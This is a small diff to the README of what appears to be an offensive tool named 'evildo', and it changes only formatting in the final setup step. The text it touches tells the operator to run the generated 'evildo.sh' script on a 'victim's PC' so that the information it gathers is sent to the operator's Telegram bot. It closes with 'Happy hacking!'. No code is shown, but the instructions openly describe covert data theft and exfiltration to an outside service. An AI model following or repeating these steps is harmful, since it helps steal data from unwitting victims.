noder-ss/evildo/README.md

 ![](assets/setup/6.png)

 Then, return to the terminal, it should create another script - 'evildo.sh'.
-You should execute it on victim's PC, and all the gathered information will be in your Telegram bot.
+You should execute it on victim's PC, and all the gathered information will be in your Telegram bot.\n
-HAPPY HACKING!
+Happy hacking!